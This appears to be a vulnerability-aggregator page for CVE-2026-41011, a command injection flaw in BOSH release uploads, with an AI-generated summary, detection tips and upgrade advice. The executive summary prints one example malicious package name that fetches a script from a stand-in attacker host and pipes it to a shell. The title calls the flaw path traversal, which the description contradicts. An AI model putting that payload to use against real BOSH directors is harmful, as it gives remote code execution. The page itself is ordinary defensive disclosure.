CVE-2026-41011
Awaiting Analysis Awaiting Analysis - Queue
Path Traversal in BOSH PackagePersister

Publication date: 2026-06-04

Last updated on: 2026-06-04

Assigner: VMware

Description
PackagePersister.validate_tgz builds "tar -tf #{tgz} 2>&1" where tgz = File.join(release_dir, 'packages', "#{name}.tgz") and name = package_meta['name'] comes directly from release.MF inside the uploaded tarball. The string is passed to Bosh::Common::Exec.sh, which executes via %x{} β€” i.e., /bin/sh -c. No Shellwords.escape is applied. The Models::Package Sequel validation (VALID_ID = /^[-0-9A-Za-z_+.]+$/i) would reject the name, but in create_package (lines 74–79) the shell-out in save_package_source_blob runs before package.save, so validation fires too late. Affected versions: - BOSH: all versions prior to v282.1.12 (inclusive); fixed in v282.1.12 or later
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-04
Last Modified
2026-06-04
Generated
2026-06-24
AI Q&A
2026-06-04
EPSS Evaluated
2026-06-23
NVD
CVE-2026-41011
EUVD
EUVD-2026-34197
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
vmware bosh to 282.1.12 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-41011 is a high-severity command injection vulnerability in Cloud Foundry's BOSH component. It occurs in the PackagePersister.validate_tgz method, which builds a shell command using a package name extracted from a release tarball without properly sanitizing it. The package name comes directly from the release.MF file inside the uploaded tarball and is passed to a shell command executed via /bin/sh -c without escaping special characters. Although there is a validation step that would reject invalid package names, this validation happens after the shell command is executed, allowing an attacker to inject arbitrary shell commands.

An attacker can exploit this by crafting a release tarball with a malicious package name containing shell metacharacters (for example, including commands like 'x;curl attacker.example/s|sh') and uploading it via the /releases endpoint. When the validate_tgz method runs, it executes the injected commands, leading to arbitrary command execution.

This vulnerability requires the attacker to have bosh.releases.upload or bosh.admin privileges and to create a new package with a unique fingerprint. The issue was fixed in BOSH version v282.1.12.

Impact Analysis

This vulnerability allows an attacker with certain privileges (bosh.releases.upload or bosh.admin) to execute arbitrary commands on the system running the BOSH component. This can lead to unauthorized access, data compromise, system manipulation, or further exploitation within the environment.

Because the attacker can inject shell commands via a crafted package name, they could potentially run malicious scripts, exfiltrate sensitive data, or disrupt system operations.

Detection Guidance

This vulnerability can be detected by monitoring for suspicious package names in uploaded release tarballs that contain shell metacharacters or unusual strings that could lead to command injection.

Specifically, you can inspect the package names inside release tarballs uploaded via the /releases endpoint for characters such as semicolons, pipes, or other shell metacharacters.

A practical approach is to extract and list package names from release tarballs and check for suspicious patterns before they are processed by BOSH.

  • Use tar to list package names inside a release tarball: tar -tf <release_tarball> | grep 'packages/'
  • Manually inspect the release.MF file inside the tarball for suspicious package names: tar -xf <release_tarball> release.MF && cat release.MF
  • Monitor logs or audit trails for uploads to the /releases endpoint and look for package names containing shell metacharacters such as ;, |, &, or backticks.
Mitigation Strategies

The immediate and recommended mitigation is to upgrade BOSH to version v282.1.12 or later, where this vulnerability has been fixed.

Until the upgrade can be performed, restrict or monitor access to the /releases endpoint to prevent untrusted users from uploading release tarballs.

Ensure that only trusted users with bosh.releases.upload or bosh.admin privileges can upload packages, as the vulnerability requires these privileges to be exploited.

Implement additional validation or scanning of release tarballs before processing to detect and block package names containing shell metacharacters.

Compliance Impact

The provided information does not specify how CVE-2026-41011 affects compliance with common standards and regulations such as GDPR or HIPAA.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-41011. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart